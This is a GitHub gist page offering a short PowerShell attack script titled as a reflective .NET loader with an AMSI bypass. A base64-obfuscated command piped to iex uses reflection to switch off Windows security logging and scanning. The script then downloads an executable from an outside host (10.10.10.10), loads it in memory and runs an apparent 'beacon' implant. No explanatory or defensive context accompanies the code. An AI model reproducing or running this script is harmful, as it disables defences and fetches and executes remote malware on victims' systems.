Created
May 28, 2021 09:09
-
-
Save aniqfakhrul/1e759dd04a1640c8bcc63c4b1aa9e746 to your computer and use it in GitHub Desktop.
Load .NET Code Reflectively + AMSI Scan Buffer Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [SySTEM.TexT.EnCODING]::uNIcodE.getStriNG([sYsTEM.conVErt]::fROmBAsE64stRINg("IwBNAGEAdAB0ACAARwByAGEAZQBiAGUAcgBzACAAUgBlAGYAbABlAGMAdABpAG8AbgAgAG0AZQB0AGgAbwBkACAAdwBpAHQAaAAgAFcATQBGADUAIABhAHUAdABvAGwAbwBnAGcAaQBuAGcAIABiAHkAcABhAHMAcwAgAAoAWwBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAKAAiAEYAdQBuAGMAYABgADMAWwBTAHQAcgBpAG4AZwAsACAAJAAoACgAWwBTAHQAcgBpAG4AZwBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAKAAnAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdADtAPUAbgAuAEIA7QBuAGQA7QBuAGcARgBsAOMAZwBzACcALgBuAG8AUgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACoAMgA0AC8AMgA0ACkAKwBbAEMAaABBAHIAXQAoADEAMQAxACsAMQA2AC0AMQA2ACkAKwBbAGMASABBAHIAXQAoADEANAArADEAMAAwACkAKwBbAEMAaABhAHIAXQAoADcAKwAxADAAMgApACsAWwBjAEgAQQBSAF0AKAA2ADgAKgA0ADMALwA0ADMAKQApACAALQByAGUAcABsAGEAYwBlACAAWwBjAEgAYQBSAF0AKABbAEIAeQB0AEUAXQAwAHgANQBjACkAKwBbAEMAaABBAFIAXQAoAFsAQgB5AHQARQBdADAAeAA3ADAAKQArAFsAYwBoAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADcAYgApACsAWwBDAEgAQQBSAF0AKAA3ADcAKgAyADkALwAyADkAKQArAFsAYwBIAGEAcgBdACgAMQAxADAAKQArAFsAYwBoAEEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADcAZAApACkAKQApAC4ARgB1AGwAbABOAGEAbQBlACkALAAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEYAaQBlAGwAZABJAG4AZgBvAF0AIgAgAC0AYQBzACAAWwBTAHQAcgBpAG4AZwBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAKABbAEMASABhAFIAXQAoADgAMwArADUANAAtADUANAApACsAWwBDAGgAQQByAF0AKABbAEIAWQB0AEUAXQAwAHgANwA5ACkAKwBbAGMAaABBAFIAXQAoAFsAYgBZAHQARQBdADAAeAA3ADMAKQArAFsAYwBoAEEAUgBdACgAWwBCAFkAVABFAF0AMAB4ADcANAApACsAWwBDAEgAQQBSAF0AKABbAGIAWQBUAEUAXQAwAHgANgA1ACkAKwBbAGMASABBAHIAXQAoADEAMAA5ACsAMgA3AC0AMgA3ACkAKwBbAEMAaABhAFIAXQAoAFsAYgBZAFQAZQBdADAAeAAyAGUAKQArAFsAYwBIAEEAcgBdACgAWwBiAHkAdABFAF0AMAB4ADUANAApACsAWwBjAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANwA5ACkAKwBbAEMAaABBAHIAXQAoADEAMQAyACkAKwBbAGMASABhAFIAXQAoAFsAQgBZAFQAZQBdADAAeAA2ADUAKQApACkAKQAsACAAWwBPAGIAagBlAGMAdABdACgAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAJAAoACcAUwB5AHMAdABlAG0ALgBNAOMAbgDhAGcAZQBtAGUAbgB0ACcALgBOAG8AUgBNAEEAbABpAHoAZQAoAFsAQwBoAEEAUgBdACgANgA1ACsANQApACsAWwBDAEgAYQByAF0AKABbAGIAWQBUAEUAXQAwAHgANgBmACkAKwBbAEMASABBAFIAXQAoAFsAYgB5AFQARQBdADAAeAA3ADIAKQArAFsAYwBoAEEAcgBdACgAWwBCAHkAVABlAF0AMAB4ADYAZAApACsAWwBDAEgAQQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAGEAUgBdACgAWwBiAHkAVABlAF0AMAB4ADUAYwApACsAWwBDAGgAQQBSAF0AKAAxADEAMgArADEAMAA4AC0AMQAwADgAKQArAFsAYwBIAEEAcgBdACgAMQAyADMAKwAyAC0AMgApACsAWwBDAGgAYQByAF0AKAA3ADcAKgA0ADUALwA0ADUAKQArAFsAQwBIAGEAcgBdACgAWwBiAFkAVABFAF0AMAB4ADYAZQApACsAWwBDAEgAYQByAF0AKABbAGIAeQBUAGUAXQAwAHgANwBkACkAKQAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBjAGgAYQByAF0AKABbAEIAeQBUAEUAXQAwAHgANAAxACkAKwBbAGMASABhAHIAXQAoAFsAYgBZAHQAZQBdADAAeAA2AGQAKQArAFsAYwBoAEEAcgBdACgAWwBiAHkAVABFAF0AMAB4ADcAMwApACsAWwBjAEgAYQByAF0AKAAxADAANQArADkAMwAtADkAMwApACsAWwBDAEgAYQByAF0AKABbAGIAWQBUAEUAXQAwAHgANQA1ACkAKwBbAGMAaABhAHIAXQAoAFsAYgB5AFQARQBdADAAeAA3ADQAKQArAFsAQwBoAEEAcgBdACgANAArADEAMAAxACkAKwBbAGMAaABhAHIAXQAoADEAMAA4ACsAMQAwADQALQAxADAANAApACsAWwBDAGgAYQBSAF0AKAA1ADYAKwA1ADkAKQApACIAKQApACwAKAAkACgAJwBHAGUAdABGAO0AZQBsAGQAJwAuAE4ATwByAE0AQQBsAGkAegBlACgAWwBDAEgAYQBSAF0AKABbAGIAWQBUAEUAXQAwAHgANAA2ACkAKwBbAGMAaABBAHIAXQAoADEAMQAxACoANwA5AC8ANwA5ACkAKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3ADIAKQArAFsAYwBIAEEAcgBdACgAWwBiAHkAdABlAF0AMAB4ADYAZAApACsAWwBDAEgAYQByAF0AKABbAGIAeQBUAEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADUAYwApACsAWwBjAGgAQQByAF0AKAA2ADMAKwA0ADkAKQArAFsAYwBIAGEAUgBdACgAWwBCAHkAVABlAF0AMAB4ADcAYgApACsAWwBDAEgAYQBSAF0AKABbAGIAeQB0AGUAXQAwAHgANABkACkAKwBbAGMAaABBAHIAXQAoADEAMQAwACoAMwA0AC8AMwA0ACkAKwBbAGMASABhAHIAXQAoADEAMgA1ACkAKQApACkALgBJAG4AdgBvAGsAZQAoACQAKAAnAOEAbQBzAO4AzQBuAO4AdABGAOAA7QBsAGUAZAAnAC4AbgBPAHIATQBhAEwAaQB6AEUAKABbAGMASABhAHIAXQAoADcAMAArADEALQAxACkAKwBbAEMAaABhAHIAXQAoAFsAYgBZAHQAZQBdADAAeAA2AGYAKQArAFsAQwBoAEEAcgBdACgAWwBiAFkAVABFAF0AMAB4ADcAMgApACsAWwBDAGgAYQBSAF0AKAAxADAAOQApACsAWwBDAEgAYQBSAF0AKABbAEIAWQB0AEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAYwBoAEEAcgBdACgAOQAyACoANwAvADcAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAdABFAF0AMAB4ADcAMAApACsAWwBjAEgAQQByAF0AKAAxADIAMwApACsAWwBjAGgAYQBSAF0AKAA3ADcAKgA0ADgALwA0ADgAKQArAFsAYwBoAGEAUgBdACgAMgA4ACsAOAAyACkAKwBbAGMASABhAHIAXQAoAFsAQgBZAHQARQBdADAAeAA3AGQAKQApACwAKAAoACIATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAiACkAIAAtAGEAcwAgAFsAUwB0AHIAaQBuAGcAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAkACgAJwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQA7QD1AG4ALgBCAO0AbgBkAO0AbgBnAEYAbADjAGcAcwAnAC4AbgBvAFIATQBBAGwAaQBaAGUAKABbAEMASABhAHIAXQAoADcAMAAqADIANAAvADIANAApACsAWwBDAGgAQQByAF0AKAAxADEAMQArADEANgAtADEANgApACsAWwBjAEgAQQByAF0AKAAxADQAKwAxADAAMAApACsAWwBDAGgAYQByAF0AKAA3ACsAMQAwADIAKQArAFsAYwBIAEEAUgBdACgANgA4ACoANAAzAC8ANAAzACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAYwBIAGEAUgBdACgAWwBCAHkAdABFAF0AMAB4ADUAYwApACsAWwBDAGgAQQBSAF0AKABbAEIAeQB0AEUAXQAwAHgANwAwACkAKwBbAGMAaABhAHIAXQAoAFsAQgBZAFQARQBdADAAeAA3AGIAKQArAFsAQwBIAEEAUgBdACgANwA3ACoAMgA5AC8AMgA5ACkAKwBbAGMASABhAHIAXQAoADEAMQAwACkAKwBbAGMAaABBAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA3AGQAKQApACkAKQApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJABUAHIAdQBlACkAOwA="))|iex | |
| Start-Sleep 1 | |
| $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/test.exe') | |
| $assem = [System.Reflection.Assembly]::Load($data) | |
| [beacon.Program]::Main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment